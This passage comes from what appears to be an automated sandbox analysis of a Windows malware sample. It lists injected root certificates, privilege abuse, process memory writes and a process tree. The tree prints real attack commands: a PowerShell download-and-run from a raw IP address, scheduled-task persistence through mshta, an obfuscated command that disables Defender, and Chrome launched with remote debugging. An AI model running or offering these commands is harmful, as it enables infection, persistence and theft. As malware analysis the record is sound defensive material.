190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a sqVWjvh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 0af8120bbc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 0af8120bbc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 rapes.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 rapes.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1976 schtasks.exe 2300 schtasks.exe 1776 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 53 IoCs
pid Process 2172 random.exe 2688 rapes.exe 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe 2660 TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE 1852 powershell.exe 912 powershell.exe 2656 powershell.exe 332 powershell.exe 332 powershell.exe 332 powershell.exe 2776 483d2fa8a0d53818306efeb32d3.exe 2920 powershell.exe 496 sqVWjvh.exe 1740 1f63359651.exe 496 sqVWjvh.exe 1852 chrome.exe 1852 chrome.exe 1576 7c80f0564f.exe 496 sqVWjvh.exe 1356 0af8120bbc.exe 496 sqVWjvh.exe 2908 d875f8b7d2.exe 1788 899dbfe959.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 2396 357210bdae.exe 2396 357210bdae.exe 2396 357210bdae.exe 3212 sqVWjvh.exe 3212 sqVWjvh.exe 3212 sqVWjvh.exe 3320 chrome.exe 3320 chrome.exe 3284 powershell.exe 3284 powershell.exe 3284 powershell.exe 3284 powershell.exe 3772 powershell.exe 620 powershell.exe 3664 powershell.exe 3856 bncn6rv.exe 3856 bncn6rv.exe 3856 bncn6rv.exe 3856 bncn6rv.exe 3856 bncn6rv.exe 3856 bncn6rv.exe 3856 bncn6rv.exe 3856 bncn6rv.exe 3856 bncn6rv.exe 3828 chrome.exe 3828 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 912 powershell.exe Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 332 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeShutdownPrivilege 1852 chrome.exe Token: SeDebugPrivilege 1984 taskkill.exe Token: SeDebugPrivilege 916 taskkill.exe Token: SeDebugPrivilege 1492 taskkill.exe Token: SeDebugPrivilege 2860 taskkill.exe Token: SeDebugPrivilege 2184 taskkill.exe Token: SeDebugPrivilege 1728 firefox.exe Token: SeDebugPrivilege 1728 firefox.exe Token: SeDebugPrivilege 2396 357210bdae.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeDebugPrivilege 3284 powershell.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeDebugPrivilege 3772 powershell.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeDebugPrivilege 620 powershell.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2172 random.exe 1548 484742576f.exe 1548 484742576f.exe 1548 484742576f.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1852 chrome.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1728 firefox.exe 1728 firefox.exe 1728 firefox.exe 1728 firefox.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 1548 484742576f.exe 1548 484742576f.exe 1548 484742576f.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1728 firefox.exe 1728 firefox.exe 1728 firefox.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe 1980 6107dcdc10.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2172 wrote to memory of 2688 2172 random.exe 31 PID 2172 wrote to memory of 2688 2172 random.exe 31 PID 2172 wrote to memory of 2688 2172 random.exe 31 PID 2172 wrote to memory of 2688 2172 random.exe 31 PID 2688 wrote to memory of 1548 2688 rapes.exe 33 PID 2688 wrote to memory of 1548 2688 rapes.exe 33 PID 2688 wrote to memory of 1548 2688 rapes.exe 33 PID 2688 wrote to memory of 1548 2688 rapes.exe 33 PID 1548 wrote to memory of 1316 1548 484742576f.exe 34 PID 1548 wrote to memory of 1316 1548 484742576f.exe 34 PID 1548 wrote to memory of 1316 1548 484742576f.exe 34 PID 1548 wrote to memory of 1316 1548 484742576f.exe 34 PID 1548 wrote to memory of 2444 1548 484742576f.exe 35 PID 1548 wrote to memory of 2444 1548 484742576f.exe 35 PID 1548 wrote to memory of 2444 1548 484742576f.exe 35 PID 1548 wrote to memory of 2444 1548 484742576f.exe 35 PID 1316 wrote to memory of 1976 1316 cmd.exe 37 PID 1316 wrote to memory of 1976 1316 cmd.exe 37 PID 1316 wrote to memory of 1976 1316 cmd.exe 37 PID 1316 wrote to memory of 1976 1316 cmd.exe 37 PID 2444 wrote to memory of 2792 2444 mshta.exe 38 PID 2444 wrote to memory of 2792 2444 mshta.exe 38 PID 2444 wrote to memory of 2792 2444 mshta.exe 38 PID 2444 wrote to memory of 2792 2444 mshta.exe 38 PID 2792 wrote to memory of 2660 2792 powershell.exe 40 PID 2792 wrote to memory of 2660 2792 powershell.exe 40 PID 2792 wrote to memory of 2660 2792 powershell.exe 40 PID 2792 wrote to memory of 2660 2792 powershell.exe 40 PID 2688 wrote to memory of 2412 2688 rapes.exe 41 PID 2688 wrote to memory of 2412 2688 rapes.exe 41 PID 2688 wrote to memory of 2412 2688 rapes.exe 41 PID 2688 wrote to memory of 2412 2688 rapes.exe 41 PID 2412 wrote to memory of 352 2412 cmd.exe 43 PID 2412 wrote to memory of 352 2412 cmd.exe 43 PID 2412 wrote to memory of 352 2412 cmd.exe 43 PID 2412 wrote to memory of 352 2412 cmd.exe 43 PID 2412 wrote to memory of 1944 2412 cmd.exe 44 PID 2412 wrote to memory of 1944 2412 cmd.exe 44 PID 2412 wrote to memory of 1944 2412 cmd.exe 44 PID 2412 wrote to memory of 1944 2412 cmd.exe 44 PID 1944 wrote to memory of 1852 1944 cmd.exe 45 PID 1944 wrote to memory of 1852 1944 cmd.exe 45 PID 1944 wrote to memory of 1852 1944 cmd.exe 45 PID 1944 wrote to memory of 1852 1944 cmd.exe 45 PID 2412 wrote to memory of 904 2412 cmd.exe 46 PID 2412 wrote to memory of 904 2412 cmd.exe 46 PID 2412 wrote to memory of 904 2412 cmd.exe 46 PID 2412 wrote to memory of 904 2412 cmd.exe 46 PID 904 wrote to memory of 912 904 cmd.exe 47 PID 904 wrote to memory of 912 904 cmd.exe 47 PID 904 wrote to memory of 912 904 cmd.exe 47 PID 904 wrote to memory of 912 904 cmd.exe 47 PID 2412 wrote to memory of 1844 2412 cmd.exe 48 PID 2412 wrote to memory of 1844 2412 cmd.exe 48 PID 2412 wrote to memory of 1844 2412 cmd.exe 48 PID 2412 wrote to memory of 1844 2412 cmd.exe 48 PID 1844 wrote to memory of 2656 1844 cmd.exe 49 PID 1844 wrote to memory of 2656 1844 cmd.exe 49 PID 1844 wrote to memory of 2656 1844 cmd.exe 49 PID 1844 wrote to memory of 2656 1844 cmd.exe 49 PID 2412 wrote to memory of 2300 2412 cmd.exe 50 PID 2412 wrote to memory of 2300 2412 cmd.exe 50 PID 2412 wrote to memory of 2300 2412 cmd.exe 50 PID 2412 wrote to memory of 2300 2412 cmd.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Users\Admin\AppData\Local\Temp\10126980101\484742576f.exe"C:\Users\Admin\AppData\Local\Temp\10126980101\484742576f.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn SWz9FmarHrH /tr "mshta C:\Users\Admin\AppData\Local\Temp\aoziCaQVE.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn SWz9FmarHrH /tr "mshta C:\Users\Admin\AppData\Local\Temp\aoziCaQVE.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1976
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\aoziCaQVE.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'TKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Users\Admin\AppData\Local\TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE"C:\Users\Admin\AppData\Local\TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2660
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10126990121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "vFcp2maF4Bo" /tr "mshta \"C:\Temp\7hQVsHDKN.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2300
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\7hQVsHDKN.hta"4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:332 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2776
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2400 -s 5044⤵
- Loads dropped DLL
- Program crash
PID:268
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe"C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe"C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:496 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1852 -
